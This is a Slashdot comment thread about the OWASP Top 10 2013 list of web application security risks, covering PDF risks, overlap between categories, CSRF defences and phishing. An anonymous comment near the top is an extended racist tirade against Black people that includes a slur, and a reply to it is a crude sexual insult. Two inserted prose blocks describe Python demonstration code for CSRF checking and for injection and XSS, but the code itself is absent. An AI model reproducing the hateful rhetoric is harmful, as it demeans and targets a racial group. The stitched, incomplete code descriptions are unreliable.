
OWASP Top 10 2013 Released

timothy posted about a year ago | from the how-come-letterman-never-reads-these-on-air? dept.


hypnosec writes "OWASP's Top 10, the Open Web Application Security Project's list of the 10 most critical web application security risks, has been updated and a new list for 2013 published. The list was last updated in 2010; in the new version the importance of cross-site scripting (XSS) and cross-site request forgery (CSRF) has been diluted a little, while risks related to broken authentication and session management have moved up a notch. Code injection, which was the topmost risk in 2010, has retained its position in the updated list. The 2013 Top Ten list (PDF) has been compiled based on half a million vulnerabilities discovered in thousands of applications from hundreds of vendors."


Programming Nerds Fail To Be Objective About Life! (-1)

Anonymous Coward | about a year ago | (#43997931)

Blacks don't think anything is their fault. Having more of themselves in prison than college at any given time is magically not their fault. Black kids that study and try to learn and do good in school to get ahead are beaten up. Did you think it was racist white kids doing that to them? Noooo... It's mainstream black kids. They beat up the black kids who study because they're "acting white". But somehow, that isn't their fault.

The crack epidemic in the 80s affected mostly blacks. Why? Because racist whites held guns to their heads and forced them to smoke crack? Nooo.... Because of their decisions to use crack. That they made. More than anybody else did. But somehow, that isn't their fault.

Black women disproportionally get most abortions. They disproportionally get knocked up out of wedlock and have kids they can't afford. If they thought abortion was expensive, just think about what it costs to raise a child. If they thought abortion was cheap, compare what birth control would have cost. Did racist whites hold guns to their heads and force them to copulate and get inseminated? Noooo.... But somehow, that isn't their fault.

Black fathers disproportionally abandon their children, leaving them as bastards raised by single mothers. Even though this causes all sorts of problems, making the kids more likely to go to jail, to not go to college, to do drugs and alcohol, to be criminals, all sorts of shit. Did racist white people hold guns to these "fathers'" heads and make them abandon their children? Noooo... But somehow, that isn't their fault.

But if you don't like niggers and OBJECTIVELY EVALUATE WHO THEY ARE AND WHAT THEY DO and then draw YOUR OWN conclusions... somehow, that's YOUR fault.

Re:Programming Nerds Fail To Be Objective About Li (0)

Anonymous Coward | about a year ago | (#43998115)

Says the obese, mongoloid whose mom sneaks out during the day and night to get banged by big black cock.

Irony (4, Funny)

ThatsNotPudding (1045640) | about a year ago | (#43998207)

The offered list of vulnerabilities is in a pdf.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998379)

And what's ironic exactly?

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998515)

PDFs are a common attack vector. Thanks Adobe!

Re:Irony (1)

Steve_Ussler (2941703) | about a year ago | (#43999485)

but coming from OWASP, they are ok.

Re:Irony (0)

Anonymous Coward | about a year ago | (#44001089)

but coming from OWASP, they are ok.

Are you sure? I'd hate to get stung.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43998775)

And what's ironic exactly [about publishing the list of vulnerabilities in a PDF]?

That they are all about discussing and fixing vulnerabilities and yet release the results in a file format known for its vulnerabilities.

Re:Irony (0)

Anonymous Coward | about a year ago | (#43999375)

What vulnerabilities exist in the PDF format? You seem to be incorrectly conflating issues with a single PDF reader with the format. So again, what's the irony about using PDF?

Re:Irony (1)

guanxi (216397) | about a year ago | (#44001487)

What vulnerabilities exist in the PDF format? You seem to be incorrectly conflating issues with a single PDF reader with the format.

The same vulnerabilities exist in many PDF readers, such as JavaScript and remote file access, even if implemented differently in the various applications.

I guess no formats are vulnerable by that reasoning; there is no vulnerability in Flash or Word formats either; it's just the players.

Non-PDF link (4, Informative)

Anonymous Coward | about a year ago | (#43998369)

forgot one (-1)

Anonymous Coward | about a year ago | (#43998541)

They forgot the most critical security risk:
basing your application in the United States or using any services with US companies or companies with US based headquarters.
You get hacked automatically, and oftentimes legally, by the NSA and various other outfits.

These look familiar (1)

dkleinsc (563838) | about a year ago | (#43999433)

The really sad part about the OWASP Top 10 lists is that they don't change very much. In a perfect world, none of the 2010 top 10 would be on this list, because they would be solved, but the fact of the matter is that most organizations don't care.

Minor criticisms of top 10 list (3, Informative)

WaffleMonster (969671) | about a year ago | (#44000155)

1. I don't understand why XSS and Injection are listed as separate items. XSS attacks are by definition injection attacks. I think separating this out de-emphasizes an important conceptual understanding applicable to a lot more domains than databases and html. To their credit they say as much.

Referer checking should not have been kept out of the mitigation section for CSRF.

"Using components with known vulnerabilities" (A9) appears to be a subset of "Security misconfiguration" (A5)

The Detectability scale is screwed up in my opinion. Every single item is either average or easy except the Difficult designation of 'Using components with known vulnerabilities' (A9)... How hard can it be to check current versions of libraries your system is using? What makes A5 easy and A9 hard?

"Sensitive data exposure" (A6) I don't think belongs in the list. It is a political item... yea encrypting sounds good but at some point you need to store a decryption key to decrypt what is encrypted - management of keys and physical systems security and infrastructure is important but I'm not sure it fits within the context of the other items which are about preventing specific attacks not about how to make being owned less bad.

What I think is missing is focus on the huge problem of tricking users via phishing / "homographic" attacks. First and foremost the whole concept of typing a password into a web form to login is fundamentally fucked up. It's right up there with fake padlock icons displayed on web sites and "two-factor" banking site picturegram logins. The industry needs to fix this shit because they are making things worse by manipulating their users into thinking they are safe with totally irrelevant security assertions which phishers are more than happy to leverage to maximum effect.

Users should be trained to ONLY type passwords into special dialogues within their browsers. We desperately need a web authentication scheme with channel bindings that don't suck ass (e.g. sent in clear or offline brute force attacks). The closest thing to deployed that fits the bill I know of is TLS-SRP.
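The Referer/Origin check the comment above says belongs in the CSRF mitigation section, as an added example in Python (not code from the OWASP document or from the comment author): it prefers the Origin header, falls back to Referer, rejects a missing or "null" source rather than passing on it, and normalizes scheme, host and port before comparing. `ALLOWED_ORIGINS` and the header values are assumptions constructed for the demonstration.

```python
"""Origin/Referer-based CSRF check for state-changing requests.

Added example, not from OWASP or the commenter. ALLOWED_ORIGINS is an
assumed deployment setting; request headers are constructed for the demo.
"""
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed: the exact origins (scheme://host[:port]) this app is served from.
ALLOWED_ORIGINS = {"https://app.example.com"}

# Methods that must not change state and therefore are not checked.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def _origin_of(url: str) -> Optional[str]:
    """Reduce a URL or Origin value to scheme://host[:port].

    Returns None when there is no usable scheme/host or the port is invalid.
    Using urlsplit().hostname (not a string prefix match) is what defeats
    'https://app.example.com.evil.net/' and 'https://app.example.com@evil.net/'.
    """
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    host = parts.hostname.lower()
    default = {"https": 443, "http": 80}.get(scheme)
    if port is None or port == default:
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def csrf_check(method: str, headers: Dict[str, str]) -> Tuple[bool, str]:
    """Decide whether a request passes the Origin/Referer CSRF check.

    Fail-closed rules:
      * safe methods are never checked;
      * Origin is preferred: browsers send it on cross-site POSTs and the
        attacker's page cannot forge or suppress it;
      * an Origin of 'null' (sandboxed frame, some redirects) is rejected;
      * Referer is consulted only when Origin is absent, and a missing
        Referer is rejected: a check that passes on absence is no check,
        since the attacker's page can strip Referer via a referrer policy.
    """
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    hdrs = {k.lower(): v for k, v in headers.items()}
    origin = hdrs.get("origin")
    if origin is not None:
        if origin.strip().lower() == "null":
            return False, "null Origin"
        src = _origin_of(origin.strip())
    else:
        referer = hdrs.get("referer")
        if not referer:
            return False, "no Origin or Referer"
        src = _origin_of(referer.strip())
    if src is None:
        return False, "unparseable source"
    if src in ALLOWED_ORIGINS:
        return True, f"origin {src} allowed"
    return False, f"origin {src} not allowed"


if __name__ == "__main__":
    # Constructed requests: legitimate same-origin, cross-site, stripped Referer.
    for method, hdrs in [
        ("POST", {"Origin": "https://app.example.com"}),
        ("POST", {"Origin": "https://evil.example"}),
        ("POST", {"Referer": "https://app.example.com.evil.net/form"}),
        ("POST", {}),
    ]:
        print(method, hdrs, "->", csrf_check(method, hdrs))
```

This is a defense in depth beside a synchronizer token, not a replacement for one: legitimate clients behind Referer-stripping proxies will be rejected, and the scheme comparison deliberately fails an `http://` Referer for an `https://` site so a downgraded page cannot post into the secure one.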

Re:Minor criticisms of top 10 list (0)

Anonymous Coward | about a year ago | (#44001135)

1. I don't understand why XSS and Injection are listed as separate items. XSS attacks are by definition injection attacks. I think separating this out de-emphasizes an important conceptual understanding applicable to a lot more domains than databases and html. To their credit they say as much.

They actually mean SQL Injection [owasp.org] .
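As an added example (not code from OWASP or from either commenter) of the point in this sub-thread that SQL injection and XSS are one bug with different interpreters, the following Python passes the same kind of attacker-controlled text through a SQL statement and an HTML fragment, once spliced into the code and once kept as data. The in-memory table, the rows and the payload strings are constructed for the demonstration.

```python
"""SQL injection and XSS as one bug class: untrusted data parsed as code.

Added example, not from OWASP or the commenters. The users table and the
payloads are constructed for the demo; SQLite runs in memory, so this
needs nothing but the standard library.
"""
import html
import sqlite3
from typing import List

# Constructed attacker inputs.
PAYLOAD_SQL = "' OR '1'='1"
PAYLOAD_HTML = '<script>location="https://attacker.invalid/?c="+document.cookie</script>'


def _db() -> sqlite3.Connection:
    """Fresh in-memory database with three constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s1"), ("bob", "s2"), ("carol", "s3")],
    )
    return conn


def lookup_vulnerable(name: str) -> List[str]:
    """String concatenation: the SQL parser sees the attacker's quote and OR."""
    conn = _db()
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(r[0] for r in conn.execute(sql))


def lookup_safe(name: str) -> List[str]:
    """Bound parameter: the value travels out of band and is never re-parsed."""
    conn = _db()
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return sorted(r[0] for r in rows)


def render_vulnerable(name: str) -> str:
    """String concatenation: the browser's HTML parser sees attacker markup."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name: str) -> str:
    """Encoding for the HTML text context: the markup characters stay data."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    print("SQL, concatenated:", lookup_vulnerable(PAYLOAD_SQL))
    print("SQL, parameterized:", lookup_safe(PAYLOAD_SQL))
    print("HTML, concatenated:", render_vulnerable(PAYLOAD_HTML))
    print("HTML, escaped:", render_safe(PAYLOAD_HTML))
```

The fix is the same shape in both cases: keep data out of the code channel (bound parameters) or encode it for the exact context it lands in (`html.escape` is right for element text and attribute values, but not for a JavaScript string or a URL, each of which needs its own encoder).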

Re:Minor criticisms of top 10 list (1)

styrotech (136124) | about a year ago | (#44002085)

The Detectability scale is screwed up in my opinion. Every single item is either average or easy except the Difficult designation of 'Using components with known vulnerabilities' (A9)... How hard can it be to check current versions of libraries your system is using?

I think they are referring to how easy it is for someone else to figure that out.

Re:Minor criticisms of top 10 list (0)

Anonymous Coward | about a year ago | (#44014501)

We should get rid of any remote password protocol.

I propose http://eccentric-authentication.org/
